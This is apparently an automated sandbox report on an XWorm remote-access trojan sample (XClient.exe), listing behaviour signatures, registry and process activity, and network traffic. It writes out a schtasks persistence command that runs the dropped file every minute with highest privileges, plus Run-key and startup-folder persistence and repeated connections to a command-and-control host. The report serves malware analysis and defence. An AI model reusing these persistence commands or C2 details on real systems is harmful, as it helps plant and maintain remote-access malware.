Malware Analysis Report

2024-11-16 13:39

Sample ID 240530-ywfk7aad47
Target XClient.exe
SHA256 94b65da2b5cc3728547f892a46e9c48c5d54477d10ea8e210304593acd3568e7
Tags
xworm persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

94b65da2b5cc3728547f892a46e9c48c5d54477d10ea8e210304593acd3568e7

Threat Level: Known bad

The file XClient.exe was found to be: Known bad.

Malicious Activity Summary

xworm persistence rat trojan

Contains code to disable Windows Defender

Detect Xworm Payload

Xworm family

Xworm

Checks computer location settings

Deletes itself

Uses the VBS compiler for execution

Loads dropped DLL

Drops startup file

Executes dropped EXE

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: AddClipboardFormatListener

Opens file in notepad (likely ransom note)

Delays execution with timeout.exe

NTFS ADS

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Gathers network information

Modifies registry class

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of SendNotifyMessage

Modifies Internet Explorer settings

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-30 20:07

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm family

xworm

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-30 20:07

Reported

2024-05-30 20:39

Platform

win10-20240404-en

Max time kernel

1794s

Max time network

1795s

Command Line

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\9 = "C:\\Users\\Admin\\AppData\\Roaming\\9" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4924 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 4924 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 3592 wrote to memory of 4188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3592 wrote to memory of 4188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3592 wrote to memory of 4188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3592 wrote to memory of 4188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3592 wrote to memory of 4188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3592 wrote to memory of 4188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3592 wrote to memory of 4188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3592 wrote to memory of 4188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3592 wrote to memory of 4188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3592 wrote to memory of 4188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3592 wrote to memory of 4188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 3940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 3940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 2416 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4188 wrote to memory of 96 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "9" /tr "C:\Users\Admin\AppData\Roaming\9"

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4188.0.818781048\1353417191" -parentBuildID 20221007134813 -prefsHandle 1700 -prefMapHandle 1676 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ea9ca815-ec1b-4eb7-859e-6323b522fd8a} 4188 "\\.\pipe\gecko-crash-server-pipe.4188" 1780 20c7dfec158 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4188.1.1361113494\2025406105" -parentBuildID 20221007134813 -prefsHandle 2116 -prefMapHandle 2112 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {59898eb1-a6a9-4e39-8218-937b14449942} 4188 "\\.\pipe\gecko-crash-server-pipe.4188" 2136 20c73070a58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4188.2.541735846\1769704188" -childID 1 -isForBrowser -prefsHandle 2944 -prefMapHandle 2920 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {777497a8-d36e-4259-a417-2f7bbb7ed55f} 4188 "\\.\pipe\gecko-crash-server-pipe.4188" 2956 20c02397958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4188.3.2011323863\664684091" -childID 2 -isForBrowser -prefsHandle 2876 -prefMapHandle 3480 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {35cb7f02-c623-463d-acf6-b3d97e3b1bf4} 4188 "\\.\pipe\gecko-crash-server-pipe.4188" 3492 20c00b95c58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4188.4.870827776\1252508252" -childID 3 -isForBrowser -prefsHandle 4208 -prefMapHandle 4204 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c423f1d2-825d-4264-b117-1c401d795f34} 4188 "\\.\pipe\gecko-crash-server-pipe.4188" 4216 20c03faa558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4188.5.1689002513\109970340" -childID 4 -isForBrowser -prefsHandle 4856 -prefMapHandle 4848 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcda37e6-4e7a-4b7f-9eee-d498e07af091} 4188 "\\.\pipe\gecko-crash-server-pipe.4188" 4868 20c0459cb58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4188.6.995046989\860672092" -childID 5 -isForBrowser -prefsHandle 5036 -prefMapHandle 5040 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f0a81f3-a31a-4e10-8d3e-fb50912b453a} 4188 "\\.\pipe\gecko-crash-server-pipe.4188" 5028 20c0459c258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4188.7.1688104317\461682386" -childID 6 -isForBrowser -prefsHandle 5220 -prefMapHandle 5224 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e71766a0-8e0e-4f03-8270-9b3b37377940} 4188 "\\.\pipe\gecko-crash-server-pipe.4188" 5212 20c0459a758 tab

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Local\Temp\stnqqf.exe

"C:\Users\Admin\AppData\Local\Temp\stnqqf.exe"

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

Network

Country Destination Domain Proto
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 44.230.111.112:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 8.8.8.8:53 166.188.117.34.in-addr.arpa udp
US 8.8.8.8:53 112.111.230.44.in-addr.arpa udp
N/A 127.0.0.1:49777 tcp
N/A 127.0.0.1:49784 tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 aus5.mozilla.org udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 34.160.144.191:443 prod.content-signature-chains.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 ciscobinary.openh264.org udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
DE 23.53.40.129:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com udp
US 8.8.8.8:53 r1---sn-aigl6ney.gvt1.com udp
GB 173.194.183.166:443 r1---sn-aigl6ney.gvt1.com tcp
US 8.8.8.8:53 r1.sn-aigl6ney.gvt1.com udp
US 8.8.8.8:53 r1.sn-aigl6ney.gvt1.com udp
US 8.8.8.8:53 129.40.53.23.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 166.183.194.173.in-addr.arpa udp
GB 173.194.183.166:443 r1.sn-aigl6ney.gvt1.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
